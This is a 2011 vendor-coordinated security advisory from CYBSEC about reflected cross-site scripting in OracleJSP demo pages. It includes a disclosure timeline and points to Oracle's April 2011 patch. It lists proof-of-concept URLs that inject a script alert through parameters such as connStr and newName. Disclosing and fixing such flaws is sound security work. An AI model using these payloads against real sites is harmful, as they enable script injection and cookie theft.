OracleJSP Demos Cross Site Scripting

`Advisory Name: Reflected Cross-Site Scripting (XSS) in OracleJSP Demos   
  
  
  
Internal Cybsec Advisory Id: 2011-0403- Reflected Cross-Site Scripting (XSS) in OracleJSP Demos  
  
  
  
Vulnerability Class: Reflected Cross-Site Scripting (XSS)  
  
  
  
Release Date: April 20, 2011  
  
  
  
Affected Applications: Confirmed in OracleJSP 1.1.2.4.0 with iAS v1.0.2.2. Other versions may also be affected  
  
  
  
Affected Platforms: Any running OracleJSP Demos   
  
  
  
Local / Remote: Remote   
  
  
  
Severity: Medium - CVSS: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)  
  
  
  
Researcher: Nahuel Grisolia  
  
  
  
Vendor Status: Patched  
  
  
  
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf  
  
  
  
Vulnerability Description:  
  
  
  
A reflected Cross Site Scripting vulnerability was found in OracleJSP 1.1.2.4.0 Demos with iAS v1.0.2.2, because scripts fail to sanitize user-supplied input. The vulnerability can be triggered by any user who is able access those Demos.  
  
  
  
Exploits:   
  
  
  
http://171.XXX.XX.64/demo/sql/index.jsp?connStr=%22%3E%3Cscript%3Ealert%28%22XSs%22%29;%3C/script%3E  
  
  
  
  
  
http://171.XXX.XX.64/demo/basic/hellouser/hellouser.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29;%3C%2Fscript%3E  
  
  
  
  
  
http://171.XXX.XX.64/demo/basic/hellouser/hellouser_jml.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E  
  
  
  
  
  
http://171.XXX.XX.64/demo/basic/simple/welcomeuser.jsp?user=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E  
  
  
  
  
  
  
  
  
  
  
  
http://171.XXX.XX.64/demo/basic/simple/usebean.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E  
  
  
  
http://171.XXX.XX.64/demo/ojspext/jmltype/index.jsp, in field "String Test"  
  
  
  
Impact:  
  
  
  
An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an attacker may obtain authorization cookies that would allow him to gain unauthorized access to the application.  
  
  
  
Solution: Install Oracle Critical Patch Update (CPU) - April 2011.  
  
  
  
Vendor Response:   
  
Feb 4, 2010 - Vendor contacted.  
  
Feb 5, 2010 - Vendor asks for mor detailed information, which is provided by Cybsec.  
  
Feb 8, 2010 - Vendor acknowledges vulnerability and assigns internal tracking ID "12907193".  
  
Apr 15, 2011 - Vendor informs vulnerability will be fixed in upcoming Critical Patch Update.  
  
Apr 18, 2011 - Vendor informs that the vulnerability is fixed in the upcoming Critical Patch Update (CPU) due to be released on April 19, 2011.  
  
Apr 19, 2011 - Vendor publishes CPU.  
  
Apr 20. 2011 - Cybsec Publishes Vulnerability.  
  
  
  
Contact Information:  
  
  
  
For more information regarding the vulnerability feel free to contact Cybsec Labs at   
  
cybseclabs <at> cybsec <dot> com  
  
  
  
About CYBSEC S.A. Security Systems   
  
  
  
Since 1996 CYBSEC S.A. is devoted exclusively to provide professional services specialized in Computer Security. More than 150 clients around the globe validate our quality and professionalism.   
  
  
  
To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is associated with other software and/or hardware provider companies.   
  
  
  
Our services are strictly focused on Information Security, protecting our clients from emerging security threats, maintaining their IT deployments available, safe, and reliable.   
  
  
  
Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing with the security community with high quality information exchange.   
  
  
  
For more information, please visit www.cybsec.com   
  
  
  
(c) 2011 - CYBSEC S.A. Security Systems  
`